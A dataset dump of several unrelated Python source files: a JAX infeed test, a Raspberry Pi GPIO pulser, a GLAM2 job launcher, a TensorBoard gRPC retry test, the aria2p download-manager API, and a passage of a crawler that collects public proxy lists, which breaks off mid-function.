source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
infeed_test.py
|
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import threading
from absl.testing import absltest
import jax
from jax import lax, numpy as np
from jax.config import config
from jax.lib import xla_client
import jax.test_util
import numpy as onp
config.parse_flags_with_absl()
FLAGS = config.FLAGS
class InfeedTest(jax.test_util.JaxTestCase):
def testInfeed(self):
@jax.jit
def f(x):
token = lax.create_token(x)
(y,), token = lax.infeed(
token, shape=(jax.ShapedArray((3, 4), np.float32),))
(z,), _ = lax.infeed(
token, shape=(jax.ShapedArray((3, 1, 1), np.float32),))
return x + y + z
x = onp.float32(1.5)
y = onp.reshape(onp.arange(12, dtype=onp.float32), (3, 4)) # onp.random.randn(3, 4).astype(onp.float32)
z = onp.random.randn(3, 1, 1).astype(onp.float32)
device = jax.local_devices()[0]
device.transfer_to_infeed((y,))
device.transfer_to_infeed((z,))
self.assertAllClose(f(x), x + y + z, check_dtypes=True)
def testInfeedThenOutfeed(self):
@jax.jit
def f(x):
token = lax.create_token(x)
y, token = lax.infeed(
token, shape=jax.ShapedArray((3, 4), np.float32))
token = lax.outfeed(token, y + onp.float32(1))
return lax.tie_in(token, x - 1)
x = onp.float32(7.5)
y = onp.random.randn(3, 4).astype(onp.float32)
execution = threading.Thread(target=lambda: f(x))
execution.start()
device = jax.local_devices()[0]
device.transfer_to_infeed((y,))
out, = device.transfer_from_outfeed(
xla_client.shape_from_pyval((y,)).with_major_to_minor_layout_if_absent())
execution.join()
self.assertAllClose(out, y + onp.float32(1), check_dtypes=True)
def testInfeedThenOutfeedInALoop(self):
def doubler(_, token):
y, token = lax.infeed(
token, shape=jax.ShapedArray((3, 4), np.float32))
return lax.outfeed(token, y * onp.float32(2))
@jax.jit
def f(n):
token = lax.create_token(n)
token = lax.fori_loop(0, n, doubler, token)
return lax.tie_in(token, n)
device = jax.local_devices()[0]
n = 10
execution = threading.Thread(target=lambda: f(n))
execution.start()
for _ in range(n):
x = onp.random.randn(3, 4).astype(onp.float32)
device.transfer_to_infeed((x,))
y, = device.transfer_from_outfeed(xla_client.shape_from_pyval((x,))
.with_major_to_minor_layout_if_absent())
self.assertAllClose(y, x * onp.float32(2), check_dtypes=True)
execution.join()
if __name__ == '__main__':
absltest.main()
|
pulseGPIO.py
|
# -*- coding: utf-8 -*-
from __future__ import print_function, division, unicode_literals
from __future__ import absolute_import
import time
import sys
import RPi.GPIO as gpio
from multiprocessing import Process, Queue
class PulseGPIO(object):
"""Set Signal on Raspberry Pi GPIO pin"""
def pulseGPIOpin(self):
# sub-process to pulse GPIO pin
while True:
ton = self.Q.get() # wait for entry in Queue
# ton > 0: pin on for ton sec
# ton = 0: pin on
# ton < 0: pin off
if ton == 0:
gpio.output(self.pin, 1)
elif ton > 0:
gpio.output(self.pin, 1)
time.sleep(ton)
gpio.output(self.pin, 0)
else:
gpio.output(self.pin, 0)
def __init__(self, pin=None):
"""Args: pin: GPIO pin number
cmdQ: multiprocessing queue"""
gpio.setmode(gpio.BCM)
if pin is None:
print("pulseGPIO config error: no GPIO Pin specified - exiting")
sys.exit(1)
self.pin = pin
self.Q = Queue(1)
try:
gpio.setup(pin, gpio.OUT) # initialize GPIO pin for output
except Exception as e:
print("pulseGPIO Error setting up GPIO output")
print(e)
# start pulser as background process
self.subprocs = []
self.subprocs.append(Process(name='pulseGPIOpin',
target=self.pulseGPIOpin))
for p in self.subprocs:
p.daemon = True
p.start()
def pulse(self, ton=None):
# produce one pulse of duration <ton>
# default ton=0.05 sec
# ton > 0: pin on for ton sec
# ton = 0: pin on
# ton < 0: pin off
if ton is None:
ton = 0.05
if self.Q.empty():
self.Q.put(ton)
def close(self):
for p in self.subprocs:
if p.is_alive():
p.terminate()
self.cmdQ.close()
gpio.cleanup(self.pin)
|
launch_glam2_cross.py
|
#
# Copyright John Reid 2009
#
"""
Code to launch the GLAM2 algorithm on the cross-validation of several fragments concurrently.
"""
import os, subprocess, logging, sys, Queue, threading
from optparse import OptionParser
from glam2 import *
#
# Initialise the logging
#
format='%(asctime)-15s %(message)s'
logging.basicConfig(level=logging.INFO, format=format)
file_handler = logging.FileHandler('launch_glam2_cross_validate.log')
file_handler.setFormatter(logging.Formatter(format))
logging.getLogger('').addHandler(file_handler)
logging.info('Command line: %s', ' '.join(sys.argv))
logging.info('Current working directory: %s', os.getcwd())
#
# Parse the options
#
option_parser = OptionParser()
option_parser.add_option(
"-j",
"--num-threads",
dest="num_threads",
type='int',
default=5,
help="How many threads to run."
)
option_parser.add_option(
"-n",
dest="n",
type='int',
default=5000000,
help="How many iterations to wait without improvement before stopping."
)
option_parser.add_option(
"-f",
"--num-folds",
dest="num_folds",
type='int',
default=5,
help="How many folds in the cross validation."
)
option_parser.add_option(
"-s",
"--num-seeds",
dest="num_seeds",
type='int',
default=8,
help="How many seeds to use."
)
options, args = option_parser.parse_args()
for option in option_parser.option_list:
if option.dest:
logging.info('%30s: %30s (%s)', option.dest, str(getattr(options, option.dest)), option.help)
data_dir = args.pop(0)
fragments = args
logging.info('Data directory: %s' % data_dir)
logging.info('Fragments: %s' % ' '.join(fragments))
def worker():
while True:
fragment, cross_fold_index, seed = q.get()
try:
tag = make_tag(fragment, cross_fold_index, seed)
fasta = os.path.join(data_dir, '%strimRM-train-x%d.fa' % (fragment, cross_fold_index))
args = [
'glam2', '-2', '-r', '1', '-I', '.1', '-J', '99999.0',
'-n', str(options.n),
'-s', str(seed),
'n', fasta
]
logging.info('%s: Executing: %s', tag, ' '.join(args))
output_file = output_filename(fragment, cross_fold_index, seed)
logging.info('%s: Sending output to: %s', tag, output_file)
output = open(output_file, 'w')
process = subprocess.Popen(args, stdout=output)
process.wait()
output.close()
retcode = process.returncode
if 0 != retcode:
logging.error('%s: Exit status: %d: %s', tag, retcode, args)
except:
type, value, traceback = sys.exc_info()
logging.error('%s: Exception (%s) caught: %s', tag, type, value)
sys.exc_clear()
q.task_done()
q = Queue.Queue()
for i in range(options.num_threads):
t = threading.Thread(target=worker)
t.setDaemon(True)
t.start()
for fragment in fragments:
for cross_fold_index in xrange(1, options.num_folds+1):
for seed in xrange(1, options.num_seeds+1):
q.put((fragment, cross_fold_index, seed))
q.join() # block until all tasks are done
|
grpc_util_test.py
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for `tensorboard.util.grpc_util`."""
import contextlib
import hashlib
import threading
from concurrent import futures
import grpc
from tensorboard.util import grpc_util
from tensorboard.util import grpc_util_test_pb2
from tensorboard.util import grpc_util_test_pb2_grpc
from tensorboard.util import test_util
from tensorboard import test as tb_test
from tensorboard import version
def make_request(nonce):
return grpc_util_test_pb2.TestRpcRequest(nonce=nonce)
def make_response(nonce):
return grpc_util_test_pb2.TestRpcResponse(nonce=nonce)
class TestGrpcServer(grpc_util_test_pb2_grpc.TestServiceServicer):
"""Helper for testing gRPC client logic with a dummy gRPC server."""
def __init__(self, handler):
super(TestGrpcServer, self).__init__()
self._handler = handler
def TestRpc(self, request, context):
return self._handler(request, context)
@contextlib.contextmanager
def run(self):
"""Context manager to run the gRPC server and yield a client for it."""
server = grpc.server(futures.ThreadPoolExecutor(max_workers=1))
grpc_util_test_pb2_grpc.add_TestServiceServicer_to_server(self, server)
port = server.add_secure_port(
"localhost:0", grpc.local_server_credentials()
)
def launch_server():
server.start()
server.wait_for_termination()
thread = threading.Thread(target=launch_server, name="TestGrpcServer")
thread.daemon = True
thread.start()
with grpc.secure_channel(
"localhost:%d" % port, grpc.local_channel_credentials()
) as channel:
yield grpc_util_test_pb2_grpc.TestServiceStub(channel)
server.stop(grace=None)
thread.join()
class CallWithRetriesTest(tb_test.TestCase):
def test_call_with_retries_succeeds(self):
def handler(request, _):
return make_response(request.nonce)
server = TestGrpcServer(handler)
with server.run() as client:
response = grpc_util.call_with_retries(
client.TestRpc, make_request(42)
)
self.assertEqual(make_response(42), response)
def test_call_with_retries_fails_immediately_on_permanent_error(self):
def handler(_, context):
context.abort(grpc.StatusCode.INTERNAL, "foo")
server = TestGrpcServer(handler)
with server.run() as client:
with self.assertRaises(grpc.RpcError) as raised:
grpc_util.call_with_retries(client.TestRpc, make_request(42))
self.assertEqual(grpc.StatusCode.INTERNAL, raised.exception.code())
self.assertEqual("foo", raised.exception.details())
def test_call_with_retries_fails_after_backoff_on_nonpermanent_error(self):
attempt_times = []
fake_time = test_util.FakeTime()
def handler(_, context):
attempt_times.append(fake_time.time())
context.abort(grpc.StatusCode.UNAVAILABLE, "foo")
server = TestGrpcServer(handler)
with server.run() as client:
with self.assertRaises(grpc.RpcError) as raised:
grpc_util.call_with_retries(
client.TestRpc, make_request(42), fake_time
)
self.assertEqual(grpc.StatusCode.UNAVAILABLE, raised.exception.code())
self.assertEqual("foo", raised.exception.details())
self.assertLen(attempt_times, 5)
self.assertBetween(attempt_times[1] - attempt_times[0], 2, 4)
self.assertBetween(attempt_times[2] - attempt_times[1], 4, 8)
self.assertBetween(attempt_times[3] - attempt_times[2], 8, 16)
self.assertBetween(attempt_times[4] - attempt_times[3], 16, 32)
def test_call_with_retries_succeeds_after_backoff_on_transient_error(self):
attempt_times = []
fake_time = test_util.FakeTime()
def handler(request, context):
attempt_times.append(fake_time.time())
if len(attempt_times) < 3:
context.abort(grpc.StatusCode.UNAVAILABLE, "foo")
return make_response(request.nonce)
server = TestGrpcServer(handler)
with server.run() as client:
response = grpc_util.call_with_retries(
client.TestRpc, make_request(42), fake_time
)
self.assertEqual(make_response(42), response)
self.assertLen(attempt_times, 3)
self.assertBetween(attempt_times[1] - attempt_times[0], 2, 4)
self.assertBetween(attempt_times[2] - attempt_times[1], 4, 8)
def test_call_with_retries_includes_version_metadata(self):
def digest(s):
"""Hashes a string into a positive 32-bit signed integer."""
return (
int(hashlib.sha256(s.encode("utf-8")).hexdigest(), 16)
& 0x7FFFFFFF
)
def handler(request, context):
metadata = context.invocation_metadata()
client_version = grpc_util.extract_version(metadata)
return make_response(digest(client_version))
server = TestGrpcServer(handler)
with server.run() as client:
response = grpc_util.call_with_retries(
client.TestRpc, make_request(0)
)
expected_nonce = digest(
grpc_util.extract_version(grpc_util.version_metadata())
)
self.assertEqual(make_response(expected_nonce), response)
class VersionMetadataTest(tb_test.TestCase):
def test_structure(self):
result = grpc_util.version_metadata()
self.assertIsInstance(result, tuple)
for kv in result:
self.assertIsInstance(kv, tuple)
self.assertLen(kv, 2)
(k, v) = kv
self.assertIsInstance(k, str)
self.assertIsInstance(v, str)
def test_roundtrip(self):
result = grpc_util.extract_version(grpc_util.version_metadata())
self.assertEqual(result, version.VERSION)
class ChannelCredsTypeTest(tb_test.TestCase):
def test_all_variants_have_configs(self):
for variant in grpc_util.ChannelCredsType.__members__.values():
(creds, options) = variant.channel_config()
self.assertIsInstance(creds, grpc.ChannelCredentials)
self.assertIsInstance(options, list)
if __name__ == "__main__":
tb_test.main()
|
api.py
|
"""
This module defines the API class, which makes use of a JSON-RPC client to provide higher-level methods to
interact easily with a remote aria2c process.
"""
import shutil
import threading
from base64 import b64encode
from pathlib import Path
from loguru import logger
from .client import Client, ClientException
from .downloads import Download
from .options import Options
from .stats import Stats
from .utils import get_version
class API:
"""
A class providing high-level methods to interact with a remote aria2c process.
This class is instantiated with a reference to a :class:`~aria2p.client.Client` instance. It then uses this client
to call remote procedures, or remote methods. While the client methods reflect exactly what aria2c is providing
through JSON-RPC, this class's methods allow for easier / faster control of the remote process. It also
wraps the information the client retrieves in Python object, like :class:`~aria2p.downloads.Download`, allowing for
even more Pythonic interactions, without worrying about payloads, responses, JSON, etc..
"""
def __init__(self, client=None):
"""
Initialization method.
Args:
client (:class:`~aria2p.client.Client`): an instance of the ``Client`` class.
"""
if client is None:
client = Client()
self.client = client
self.listener = None
def __repr__(self):
return f"API({self.client!r})"
def add_magnet(self, magnet_uri, options=None, position=None):
"""
Add a download with a Magnet URI.
Args:
magnet_uri (str): the Magnet URI.
options (:class:`~aria2p.options.Options` or dict): an instance of the ``Options`` class or a dictionary
containing aria2c options to create the download with.
position (int): the position where to insert the new download in the queue. Start at 0 (top).
Returns:
:class:`~aria2p.downloads.Download` instance: the newly created download object.
"""
if options is None:
options = {}
if isinstance(options, Options):
client_options = options.get_struct()
else:
client_options = options
gid = self.client.add_uri([magnet_uri], client_options, position)
return self.get_download(gid)
def add_torrent(self, torrent_file_path, uris=None, options=None, position=None):
"""
Add a download with a torrent file (usually .torrent extension).
Args:
torrent_file_path (str/Path): the path to the torrent file.
uris (list of str): a list of URIs used for Web-seeding.
options (:class:`~aria2p.options.Options` or dict): an instance of the ``Options`` class or a dictionary
containing aria2c options to create the download with.
position (int): the position where to insert the new download in the queue. Start at 0 (top).
Returns:
:class:`~aria2p.downloads.Download` instance: the newly created download object.
"""
if uris is None:
uris = []
if options is None:
options = {}
if isinstance(options, Options):
client_options = options.get_struct()
else:
client_options = options
with open(torrent_file_path, "rb") as stream:
torrent_contents = stream.read()
encoded_contents = b64encode(torrent_contents).decode("utf8")
gid = self.client.add_torrent(encoded_contents, uris, client_options, position)
return self.get_download(gid)
def add_metalink(self, metalink_file_path, options=None, position=None):
"""
Add a download with a Metalink file.
Args:
metalink_file_path (str/Path): the path to the Metalink file.
options (:class:`~aria2p.options.Options` or dict): an instance of the ``Options`` class or a dictionary
containing aria2c options to create the download with.
position (int): the position where to insert the new download in the queue. Start at 0 (top).
Returns:
list of :class:`~aria2p.downloads.Download`: the newly created download objects.
"""
if options is None:
options = {}
if isinstance(options, Options):
client_options = options.get_struct()
else:
client_options = options
with open(metalink_file_path, "rb") as stream:
metalink_contents = stream.read()
encoded_contents = b64encode(metalink_contents).decode("utf8")
gids = self.client.add_metalink(encoded_contents, client_options, position)
return self.get_downloads(gids)
def add_uris(self, uris, options=None, position=None):
"""
Add a download with a URL (or more).
Args:
uris (list of str): a list of URIs that point to the same resource.
options (:class:`~aria2p.options.Options` or dict): an instance of the ``Options`` class or a dictionary
containing aria2c options to create the download with.
position (int): the position where to insert the new download in the queue. Start at 0 (top).
Returns:
:class:`~aria2p.downloads.Download` instance: the newly created download object.
"""
if options is None:
options = {}
if isinstance(options, Options):
client_options = options.get_struct()
else:
client_options = options
gid = self.client.add_uri(uris, client_options, position)
return self.get_download(gid)
def search(self, patterns):
"""
Not implemented.
Search and return :class:`~aria2p.downloads.Download` object based on multiple patterns.
Args:
patterns (list of dict): the patterns used to filter the download list.
Returns:
list of :class:`~aria2p.downloads.Download` instances: the download objects matching the patterns.
"""
# gid
# status
# totalLength
# completedLength
# uploadLength
# bitfield
# downloadSpeed
# uploadSpeed
# infoHash
# numSeeders
# seeder
# pieceLength
# numPieces
# connections
# errorCode
# errorMessage
# followedBy
# following
# belongsTo
# dir
# files
# bittorrent
# announceList
# comment
# creationDate
# mode
# info
# name
# verifiedLength
# verifyIntegrityPending
raise NotImplementedError
def get_download(self, gid):
"""
Get a :class:`~aria2p.downloads.Download` object thanks to its GID.
Args:
gid (str): the GID of the download to get.
Returns:
:class:`~aria2p.downloads.Download` instance: the retrieved download object.
"""
return Download(self, self.client.tell_status(gid))
def get_downloads(self, gids=None):
"""
Get a list of :class:`~aria2p.downloads.Download` object thanks to their GIDs.
Args:
gids (list of str): the GIDs of the downloads to get. If None, return all the downloads.
Returns:
list of :class:`~aria2p.downloads.Download` instances: the retrieved download objects.
"""
downloads = []
if gids:
for gid in gids:
downloads.append(Download(self, self.client.tell_status(gid)))
else:
structs = []
structs.extend(self.client.tell_active())
structs.extend(self.client.tell_waiting(0, 1000))
structs.extend(self.client.tell_stopped(0, 1000))
downloads = [Download(self, struct) for struct in structs]
return downloads
def move(self, download, pos):
"""
Move a download in the queue, relatively to its current position.
Args:
download (:class:`~aria2p.downloads.Download`): the download object to move.
pos (int): the relative position (1 to move down, -1 to move up, -2 to move up two times, etc.).
Returns:
int: The new position of the download.
"""
return self.client.change_position(download.gid, pos, "POS_CUR")
def move_to(self, download, pos):
"""
Move a download in the queue, with absolute positioning.
Args:
download (:class:`~aria2p.downloads.Download`): the download object to move.
pos (int): the absolute position in the queue where to move the download. 0 for top, -1 for bottom.
Returns:
int: The new position of the download.
"""
if pos < 0:
how = "POS_END"
pos = -pos
else:
how = "POS_SET"
return self.client.change_position(download.gid, pos, how)
def move_up(self, download, pos=1):
"""
Move a download up in the queue.
Args:
download (:class:`~aria2p.downloads.Download`): the download object to move.
pos (int): number of times to move up. With negative values, will move down (use move or move_down instead).
Returns:
int: The new position of the download.
"""
return self.client.change_position(download.gid, -pos, "POS_CUR")
def move_down(self, download, pos=1):
"""
Move a download down in the queue.
Args:
download (:class:`~aria2p.downloads.Download`): the download object to move.
pos (int): number of times to move down. With negative values, will move up (use move or move_up instead).
Returns:
int: The new position of the download.
"""
return self.client.change_position(download.gid, pos, "POS_CUR")
def move_to_top(self, download):
"""
Move a download to the top of the queue.
Args:
download (:class:`~aria2p.downloads.Download`): the download object to move.
Returns:
int: The new position of the download.
"""
return self.client.change_position(download.gid, 0, "POS_SET")
def move_to_bottom(self, download):
"""
Move a download to the bottom of the queue.
Args:
download (:class:`~aria2p.downloads.Download`): the download object to move.
Returns:
int: The new position of the download.
"""
return self.client.change_position(download.gid, 0, "POS_END")
def remove(self, downloads, force=False, files=False, clean=True):
"""
Remove the given downloads from the list.
Args:
downloads (list of :class:`~aria2p.downloads.Download`): the list of downloads to remove.
force (bool): whether to force the removal or not.
files (bool): whether to remove downloads files as well.
clean (bool): whether to remove the aria2 control file as well.
Returns:
list of bool: Success or failure of the operation for each given download.
"""
# TODO: batch/multicall candidate
if force:
remove_func = self.client.force_remove
else:
remove_func = self.client.remove
result = []
for download in downloads:
if download.is_complete or download.is_removed or download.has_failed:
logger.debug(f"Try to remove download result {download.gid}")
try:
self.client.remove_download_result(download.gid)
except ClientException as error:
logger.exception(error)
result.append(error)
else:
logger.success(f"Removed download result {download.gid}")
result.append(True)
else:
logger.debug(f"Try to remove download {download.gid}")
try:
removed_gid = remove_func(download.gid)
except ClientException as error:
logger.exception(error)
result.append(error)
else:
logger.success(f"Removed download {download.gid}")
result.append(True)
try:
self.client.remove_download_result(download.gid)
except ClientException as error2:
logger.debug(f"Failed to remove download result {download.gid}")
logger.opt(exception=True).trace(error2)
if removed_gid != download.gid:
logger.debug(
f"Removed download GID#{removed_gid} is different than download GID#{download.gid}"
)
try:
self.client.remove_download_result(removed_gid)
except ClientException as error2:
logger.debug(f"Failed to remove download result {removed_gid}")
logger.opt(exception=True).trace(error2)
if clean:
# FUTURE: use missing_ok parameter on Python 3.8
try:
download.control_file_path.unlink()
except FileNotFoundError:
logger.debug(f"aria2 control file {download.control_file_path} was not found")
else:
logger.debug(f"Removed control file {download.control_file_path}")
if files and result[-1]:
self.remove_files([download], force=True)
return result
def remove_all(self, force=False):
"""
Remove all downloads from the list.
Args:
force (bool): whether to force the removal or not.
Returns:
bool: Success or failure of the operation to remove all downloads.
"""
return all(self.remove(self.get_downloads(), force=force))
def pause(self, downloads, force=False):
"""
Remove the given downloads from the list.
Args:
downloads (list of :class:`~aria2p.downloads.Download`): the list of downloads to remove.
force (bool): whether to pause immediately without contacting servers or not.
Returns:
list of bool: Success or failure of the operation for each given download.
"""
# TODO: batch/multicall candidate
if force:
pause_func = self.client.force_pause
else:
pause_func = self.client.pause
result = []
for download in downloads:
try:
pause_func(download.gid)
except ClientException as error:
logger.debug(f"Failed to pause download {download.gid}")
logger.opt(exception=True).trace(error)
result.append(error)
else:
result.append(True)
return result
def pause_all(self, force=False):
"""
Remove the given downloads from the list.
Args:
force (bool): whether to pause immediately without contacting servers or not.
Returns:
bool: Success or failure of the operation to pause all downloads.
"""
if force:
pause_func = self.client.force_pause_all
else:
pause_func = self.client.pause_all
return pause_func() == "OK"
def resume(self, downloads):
"""
Resume (unpause) the given downloads.
Args:
downloads (list of :class:`~aria2p.downloads.Download`): the list of downloads to resume.
Returns:
list of bool: Success or failure of the operation for each given download.
"""
# TODO: batch/multicall candidate
result = []
for download in downloads:
try:
self.client.unpause(download.gid)
except ClientException as error:
logger.debug(f"Failed to resume download {download.gid}")
logger.opt(exception=True).trace(error)
result.append(error)
else:
result.append(True)
return result
def resume_all(self):
"""
Resume (unpause) all downloads.
Returns:
bool: Success or failure of the operation to resume all downloads.
"""
return self.client.unpause_all() == "OK"
def autopurge(self):
"""
Purge completed, removed or failed downloads from the queue.
Returns:
bool: Success or failure of the operation.
"""
version = get_version()
if version.major == 0 and 9 > version.minor >= 7:
logger.warning("Future change warning: API method 'autopurge' will be renamed 'purge' in version 0.9.0.")
return self.client.purge_download_result()
def purge(self, downloads):
"""
Purge given downloads from the queue.
Returns:
list of bool: Success or failure of the operation for each download.
"""
# TODO: batch/multicall candidate
logger.warning(
"Deprecation warning: API method 'purge' is deprecated in favor of method 'remove', "
"and will be removed in version 0.7.0."
)
result = []
for download in downloads:
try:
self.client.remove_download_result(download.gid)
except ClientException as error:
logger.exception(error)
result.append(error)
else:
result.append(True)
return result
def purge_all(self):
"""
Purge all downloads from the list.
Returns:
bool: Success or failure of the operation to purge all downloads.
"""
logger.warning(
"Deprecation warning: API method 'purge_all' is deprecated, and will be removed in version 0.7.0."
)
return all(self.purge(self.get_downloads()))
def get_options(self, downloads):
"""
Get options for each of the given downloads.
Args:
downloads (list of :class:`~aria2p.downloads.Download`): the list of downloads to get the options of.
Returns:
list of :class:`~aria2p.options.Options`: options object for each given download.
"""
# TODO: batch/multicall candidate
options = []
for download in downloads:
options.append(Options(self, self.client.get_option(download.gid), download))
return options
def get_global_options(self):
"""
Get the global options.
Returns:
:class:`~aria2p.options.Options` instance: the global aria2c options.
"""
return Options(self, self.client.get_global_option())
def set_options(self, options, downloads):
"""
Set options for specific downloads.
Args:
options (:class:`~aria2p.options.Options` or dict): an instance of the ``Options`` class or a dictionary
containing aria2c options to create the download with.
downloads (list of :class:`~aria2p.downloads.Download`): the list of downloads to set the options for.
Returns:
list of bool: Success or failure of the operation for changing options for each given download.
"""
if isinstance(options, Options):
client_options = options.get_struct()
else:
client_options = options
# TODO: batch/multicall candidate
results = []
for download in downloads:
results.append(self.client.change_option(download.gid, client_options) == "OK")
return results
def set_global_options(self, options):
"""
Set global options.
Args:
options (:class:`~aria2p.options.Options` or dict): an instance of the ``Options`` class or a dictionary
containing aria2c options to create the download with.
Returns:
bool: Success or failure of the operation for changing global options.
"""
if isinstance(options, Options):
client_options = options.get_struct()
else:
client_options = options
return self.client.change_global_option(client_options) == "OK"
def get_stats(self):
"""
Get the stats of the remote aria2c process.
Returns:
:class:`~aria2p.stats.Stats` instance: the global stats returned by the remote process.
"""
return Stats(self.client.get_global_stat())
@staticmethod
def remove_files(downloads, force=False):
"""
Remove downloaded files.
Args:
downloads (list of :class:`~aria2p.downloads.Download`): the list of downloads for which to remove files.
force (bool): whether to remove files even if download is not complete.
Returns:
list of bool: Success or failure of the operation for each given download.
"""
results = []
for download in downloads:
if download.is_complete or force:
for path in download.root_files_paths:
if path.is_dir():
shutil.rmtree(str(path))
else:
path.unlink()
results.append(True)
else:
results.append(False)
return results
@staticmethod
def move_files(downloads, to_directory, force=False):
"""
Move downloaded files to another directory.
Args:
downloads (list of :class:`~aria2p.downloads.Download`): the list of downloads for which to move files.
to_directory (str/Path): the target directory to move files to.
force (bool): whether to move files even if download is not complete.
Returns:
list of bool: Success or failure of the operation for each given download.
"""
if isinstance(to_directory, str):
to_directory = Path(to_directory)
# raises FileExistsError when target is already a file
to_directory.mkdir(parents=True, exist_ok=True)
results = []
for download in downloads:
if download.is_complete or force:
for path in download.root_files_paths:
shutil.move(str(path), str(to_directory))
results.append(True)
else:
results.append(False)
return results
@staticmethod
def copy_files(downloads, to_directory, force=False):
"""
Copy downloaded files to another directory.
Args:
downloads (list of :class:`~aria2p.downloads.Download`): the list of downloads for which to move files.
to_directory (str/Path): the target directory to copy files into.
force (bool): whether to move files even if download is not complete.
Returns:
list of bool: Success or failure of the operation for each given download.
"""
if isinstance(to_directory, str):
to_directory = Path(to_directory)
# raises FileExistsError when target is already a file
to_directory.mkdir(parents=True, exist_ok=True)
results = []
for download in downloads:
if download.is_complete or force:
for path in download.root_files_paths:
if path.is_dir():
shutil.copytree(str(path), str(to_directory / path.name))
elif path.is_file():
shutil.copy(str(path), str(to_directory))
results.append(True)
else:
results.append(False)
return results
def listen_to_notifications(self, threaded=False, **kwargs):
"""
Start listening to aria2 notifications via WebSocket.
This method differs from :meth:`~aria2p.client.Client.listen_to_notifications` in that it expects callbacks
accepting two arguments, ``api`` and ``gid``, instead of only ``gid``.
Accepting ``api`` allows to use the high-level methods of the :class:`~aria2p.api.API` class.
Stop listening to notifications with the :meth:`~aria2p.api.API.stop_listening` method.
Args:
threaded (bool): Whether to start the listening loop in a thread or not (non-blocking or blocking).
"""
def closure(callback):
return (lambda gid: callback(self, gid)) if callable(callback) else None
def run():
self.client.listen_to_notifications(
**{key: closure(value) if key.startswith("on_") else value for key, value in kwargs.items()}
)
if threaded:
kwargs["handle_signals"] = False
self.listener = threading.Thread(target=run)
self.listener.start()
else:
run()
def stop_listening(self):
"""
Stop listening to notifications.
If the listening loop was threaded, this method will wait for the thread to finish.
The time it takes for the thread to finish will depend on the timeout given while calling
:meth:`~aria2p.api.API.listen_to_notifications`.
"""
self.client.stop_listening()
if self.listener:
self.listener.join()
self.listener = None
|
crawler.py
|
import time
import json
import re
import datetime
import threading
import requests
from lxml import etree
from config import configger
from verification import verify
from storage import ProxyInstance
from webapi import APIMiddleware
class CrawlerMeta(object):
def __init__(self, *args, **kwargs):
self.headers = {
'User-Agent': 'Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Mobile Safari/537.36',
}
self.api_mdw = APIMiddleware()
def check_alive(self):
# reach the upper bound: the crawler can close, else it has to work
# basically like Schmidt Trigger
if self.api_mdw.get_len('ggl') >= configger.STORAGE_NONGOOGLE_UPPER_BOUND \
and self.api_mdw.get_len('non') >= configger.STORAGE_GOOGLE_UPPER_BOUND:
return False
else:
return True
def download(self, *args, **kwargs):
pass
def parse(self, *args, **kwargs):
pass
def save(self, obj):
self.api_mdw.save(obj)
def run(self):
pass
class hookzof_socks5_list(CrawlerMeta):
def __init__(self, *args, **kwargs):
super(hookzof_socks5_list, self).__init__(*args, **kwargs)
self.base_url = 'https://raw.githubusercontent.com/hookzof/socks5_list/master/proxy.txt'
self.protocol = 'socks5'
def download(self):
response = requests.get(self.base_url, headers=self.headers)
response.raise_for_status()
return response.text.split('\n')
def parse(self, lines):
proxies = []
for line in lines:
line = line.strip()
if len(line.split(':')) == 2:
px = ProxyInstance(ip=line.split(':')[0],
port=line.split(':')[1],
protocol='socks5')
proxies.append(px)
return proxies
def run(self):
print('hookzof_socks5_list')
if not self.check_alive():
return
texts = self.download()
objs = self.parse(texts)
for obj in objs:
if not self.check_alive():
break
obj_ = verify(obj)
if obj_:
self.save(obj_)
class dxxzst_free_proxy_list(CrawlerMeta):
def __init__(self, *args, **kwargs):
super(dxxzst_free_proxy_list, self).__init__(*args, *kwargs)
self.base_url = 'https://raw.githubusercontent.com/dxxzst/free-proxy-list/master/README.md'
def download(self):
response = requests.get(self.base_url, headers=self.headers)
response.raise_for_status()
return response.text
def parse(self, text):
resultset = []
rs = re.findall(r'\|\d+\.\d+\.\d+\.\d+\|\d+\|https?\|.*?\|.*?\|', text)
for r in rs:
r = r.strip()
r_ = r.split('|')
px = ProxyInstance(ip=r_[1],
port=r_[2],
protocol=r_[3],
anonymity=r_[4],
location=r_[5])
resultset.append(px)
return resultset
def run(self):
print('dxxzst_free_proxy_list')
if not self.check_alive():
return
text = self.download()
objs = self.parse(text)
for obj in objs:
if not self.check_alive():
break
obj_ = verify(obj)
if obj_:
self.save(obj_)
class TheSpeedX_SOCKS_List(CrawlerMeta):
def __init__(self, *args, **kwargs):
super(TheSpeedX_SOCKS_List, self).__init__(*args, **kwargs)
self.base_url = 'https://raw.githubusercontent.com/TheSpeedX/SOCKS-List/master/socks.txt'
self.protocol = 'socks5'
def download(self):
response = requests.get(self.base_url, headers=self.headers)
response.raise_for_status()
return response.text
def parse(self, text):
resultset = []
rs = re.findall(r'\d+\.\d+\.\d+\.\d+:\d+', text)
for r in rs:
r = r.strip()
r_ = r.split(':')
px = ProxyInstance(ip=r_[0],
port=r_[1],
protocol=self.protocol)
resultset.append(px)
return resultset
def run(self):
print('TheSpeedX_SOCKS_List')
if not self.check_alive():
return
texts = self.download()
objs = self.parse(texts)
for obj in objs:
if not self.check_alive():
break
obj_ = verify(obj)
if obj_:
self.save(obj_)
class mclvren_proxy_list(CrawlerMeta):
def __init__(self, *args, **kwargs):
super(mclvren_proxy_list, self).__init__(*args, *kwargs)
self.base_url = 'https://raw.githubusercontent.com/mclvren/proxy-list/master/https.txt'
def download(self):
response = requests.get(self.base_url, headers=self.headers)
response.raise_for_status()
return response.text
def parse(self, text):
resultset = []
